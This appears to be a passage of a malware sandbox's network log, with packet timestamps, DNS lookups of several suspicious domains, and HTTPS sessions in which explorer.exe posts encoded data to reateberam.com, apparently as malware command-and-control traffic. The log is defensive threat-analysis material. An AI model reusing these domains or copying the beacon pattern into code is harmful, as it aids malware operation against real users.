                                                                  Dec 2, 2024 18:45:15.670283079 CET44349986104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:15.670357943 CET49986443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:15.670877934 CET49986443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:15.670892000 CET44349986104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:16.943713903 CET44349986104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:16.944086075 CET49986443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:16.945821047 CET49986443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:16.945821047 CET49986443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:16.945831060 CET44349986104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:16.945846081 CET44349986104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:18.682240009 CET44349986104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:18.682323933 CET44349986104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:18.682353020 CET49986443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:18.682555914 CET49986443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:18.682601929 CET49986443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:18.682610035 CET44349986104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:18.759682894 CET49995443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:18.759710073 CET44349995104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:18.760885954 CET49995443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:18.761053085 CET49995443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:18.761065960 CET44349995104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:20.031522989 CET44349995104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:20.032123089 CET49995443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:20.032857895 CET49995443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:20.032864094 CET44349995104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:20.034739971 CET49995443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:20.034744978 CET44349995104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:21.710541010 CET44349995104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:21.710623980 CET44349995104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:01.494127989 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:01.494548082 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:01.494554996 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:01.494812012 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:01.494816065 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.173602104 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.173655033 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.173664093 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.173693895 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.173701048 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.173728943 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.173732042 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.173769951 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.174165010 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.174180984 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.874695063 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.874723911 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.874876976 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.875205994 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.875217915 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:04.165347099 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:04.165436983 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:04.166078091 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:04.166083097 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:04.166392088 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:04.166399002 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:04.861850023 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:04.861970901 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:04.861977100 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:04.862052917 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:04.862276077 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:04.862288952 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:05.080375910 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:05.080420971 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:05.080698013 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:05.081187963 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:05.081202984 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:06.370137930 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:06.370229959 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:06.370709896 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:06.370722055 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:06.370914936 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:06.370919943 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.192090988 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.192183018 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.192213058 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.192336082 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.192833900 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.192900896 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.193165064 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.193223000 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.193223000 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.193237066 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.194998026 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.247909069 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.247956991 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.248083115 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.248416901 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.248429060 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:08.520876884 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:08.520945072 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:08.521856070 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:08.521867037 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:08.522448063 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:08.522455931 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:09.276623964 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:09.276719093 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:09.276741982 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:09.276880980 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:09.276992083 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:09.277014017 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:09.339863062 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:09.339910030 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:09.340456009 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:09.343909025 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:09.343923092 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:10.558180094 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:10.558249950 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:10.558942080 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:10.558953047 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:10.559250116 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:10.559256077 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:11.316338062 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:11.316479921 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:11.316581011 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:11.316989899 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:11.317011118 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:11.388175964 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:11.388231039 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:11.388438940 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:11.388706923 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:11.388717890 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:12.732551098 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:12.734710932 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:12.734710932 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:12.734741926 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:12.737920046 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:12.737926960 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:13.425648928 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:13.425738096 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:13.426382065 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:13.426382065 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:13.597407103 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:13.597466946 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:13.597544909 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:13.598038912 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:13.598058939 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:13.814843893 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:13.814874887 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:14.887506008 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:14.887790918 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:14.888389111 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:14.888389111 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:14.888400078 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:14.888415098 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:15.589500904 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:15.589554071 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.589581013 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:15.589601040 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:15.589618921 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.589653015 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.589953899 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.589967966 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:15.709645987 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.709693909 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:15.709752083 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.710237026 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.710247040 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:16.974603891 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:16.974776983 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:16.975419044 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:16.975428104 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:16.975752115 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:16.975758076 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:17.727924109 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:17.728018999 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:17.728069067 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:17.728069067 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:17.728409052 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:17.728429079 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:17.809017897 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:17.809089899 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:17.809161901 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:17.809571981 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:17.809592009 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.099457026 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.099576950 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.100027084 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.100037098 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.100255013 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.100260973 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.944760084 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.944823980 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.944853067 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.944870949 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.944897890 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.944921017 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.945287943 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.945301056 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:20.029954910 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:20.030009031 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:20.030086994 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:20.030488968 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:20.030502081 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:21.325748920 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:21.328327894 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:21.389941931 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:21.389941931 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:21.389956951 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:21.389970064 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.035419941 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.035469055 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.035487890 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.035531044 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.035537004 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.035583973 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.035586119 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.035629988 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.035912037 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.035931110 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.147063017 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.147108078 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.147190094 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.147610903 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.147624016 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:23.410845041 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:23.410993099 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:23.411554098 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:23.411559105 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:23.411748886 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:23.411751986 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:24.186405897 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:24.186502934 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:24.186603069 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:24.186603069 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:24.194647074 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:24.194665909 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:24.683084965 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:24.683135986 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:24.683273077 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:24.683818102 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:24.683829069 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:25.947431087 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:25.947534084 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:25.947948933 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:25.947956085 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:25.948246956 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:25.948251963 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:26.713272095 CET44350025172.67.217.190192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 2, 2024 18:42:59.796358109 CET | 192.168.2.5 | 1.1.1.1 | 0xbc1f | Standard query (0) | huanvn.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:43:02.728329897 CET | 192.168.2.5 | 1.1.1.1 | 0x2208 | Standard query (0) | huanvn.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:43:13.840821028 CET | 192.168.2.5 | 1.1.1.1 | 0x1471 | Standard query (0) | vutarf.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:43:24.944145918 CET | 192.168.2.5 | 1.1.1.1 | 0xbe26 | Standard query (0) | vutarf.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:43:34.090838909 CET | 192.168.2.5 | 1.1.1.1 | 0xf310 | Standard query (0) | vutarf.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:44:42.943789005 CET | 192.168.2.5 | 1.1.1.1 | 0x81f7 | Standard query (0) | reateberam.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:45:08.249401093 CET | 192.168.2.5 | 1.1.1.1 | 0x3b4d | Standard query (0) | dogirafer.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 2, 2024 18:43:00.168072939 CET | 1.1.1.1 | 192.168.2.5 | 0xbc1f | No error (0) | huanvn.com | | 103.57.249.207 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:43:02.871155977 CET | 1.1.1.1 | 192.168.2.5 | 0x2208 | No error (0) | huanvn.com | | 103.57.249.207 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:43:11.004147053 CET | 1.1.1.1 | 192.168.2.5 | 0xd559 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:43:11.004147053 CET | 1.1.1.1 | 192.168.2.5 | 0xd559 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:43:14.497829914 CET | 1.1.1.1 | 192.168.2.5 | 0x1471 | No error (0) | vutarf.com | | 94.232.43.224 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:43:25.320846081 CET | 1.1.1.1 | 192.168.2.5 | 0xbe26 | No error (0) | vutarf.com | | 94.232.43.224 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:43:34.458060026 CET | 1.1.1.1 | 192.168.2.5 | 0xf310 | No error (0) | vutarf.com | | 94.232.43.224 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:44:43.086226940 CET | 1.1.1.1 | 192.168.2.5 | 0x81f7 | No error (0) | reateberam.com | | 172.67.217.190 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:44:43.086226940 CET | 1.1.1.1 | 192.168.2.5 | 0x81f7 | No error (0) | reateberam.com | | 104.21.16.251 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:44:54.557385921 CET | 1.1.1.1 | 192.168.2.5 | 0x8578 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:44:54.557385921 CET | 1.1.1.1 | 192.168.2.5 | 0x8578 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:45:08.412924051 CET | 1.1.1.1 | 192.168.2.5 | 0x3b4d | No error (0) | dogirafer.com | | 104.21.68.89 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 18:45:08.412924051 CET | 1.1.1.1 | 192.168.2.5 | 0x3b4d | No error (0) | dogirafer.com | | 172.67.192.128 | A (IP address) | IN (0x0001) | false
                                                                  • reateberam.com
                                                                  • dogirafer.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49907 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-02 17:44:44 UTC | 416 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hmdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 92
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:44:44 UTC92OUTData Raw: 4c 48 44 4d 46 38 2f 6d 69 75 38 77 5a 78 61 4b 31 32 7a 6c 79 48 78 50 62 6b 43 45 44 53 71 37 50 4b 48 76 2f 6d 4f 49 4d 47 66 2f 7a 54 71 76 33 47 2f 57 36 50 6e 76 74 69 45 36 65 52 70 37 49 38 33 73 6e 6b 68 63 57 65 2f 71 78 36 78 74 7a 50 48 55 30 36 70 42 69 45 45 3d
                                                                  Data Ascii: LHDMF8/miu8wZxaK12zlyHxPbkCEDSq7PKHv/mOIMGf/zTqv3G/W6PnvtiE6eRp7I83snkhcWe/qx6xtzPHU06pBiEE=
2024-12-02 17:44:45 UTC | 789 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:44:45 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5e74ERtA%2BfBQnivRhAg5AqzV3H6uJvzps67hovkye0KqoUQ3hMzFGaT71OE4hsh%2BhmWV4KCloH7V5uhDeavPBBGpHu4zGW3c16uxWSdLMd1yMpSNZUFtT5N7TA8lA7zisA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd2070ae1136a0-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=56258&min_rtt=30547&rtt_var=29820&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1168&delivery_rate=95590&cwnd=32&unsent_bytes=0&cid=9e39c87d544dce7b&ts=876&x=0"
                                                                  2024-12-02 17:44:45 UTC98INData Raw: 35 63 0d 0a 50 69 57 62 51 38 57 33 33 49 70 67 59 52 76 63 68 57 61 73 79 6e 4e 4b 4f 45 33 51 41 30 36 71 5a 76 36 33 74 69 2f 45 4b 52 69 62 6e 32 4c 39 30 57 37 54 36 5a 58 68 73 54 56 71 4a 6b 38 75 4e 70 58 70 67 46 34 69 43 62 62 51 73 4b 51 50 75 70 53 70 70 34 51 44 31 77 3d 3d 0d 0a
                                                                  Data Ascii: 5cPiWbQ8W33IpgYRvchWasynNKOE3QA06qZv63ti/EKRibn2L90W7T6ZXhsTVqJk8uNpXpgF4iCbbQsKQPupSpp4QD1w==
                                                                  2024-12-02 17:44:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49916 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-02 17:44:47 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hndViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
2024-12-02 17:44:48 UTC | 796 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:44:48 GMT
